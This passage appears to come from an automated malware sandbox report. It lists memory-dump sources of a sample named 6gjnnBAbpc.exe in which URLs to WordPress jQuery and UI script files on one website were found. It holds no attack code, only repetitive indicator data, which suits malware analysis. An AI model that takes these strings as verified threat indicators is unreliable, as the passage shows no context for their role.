00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/css/jquery-ui-dialog.min.css?ver=6.1.1
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.9
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/js/jquery/jquery.min.js?ver=3.6.1
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/js/jquery/ui/button.min.js?ver=1.13.2
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/js/jquery/ui/checkboxradio.min.js?ver=1.13.2
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/js/jquery/ui/controlgroup.min.js?ver=1.13.2
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/js/jquery/ui/core.min.js?ver=1.13.2
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/js/jquery/ui/dialog.min.js?ver=1.13.2
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/js/jquery/ui/draggable.min.js?ver=1.13.2
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/js/jquery/ui/mouse.min.js?ver=1.13.2
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 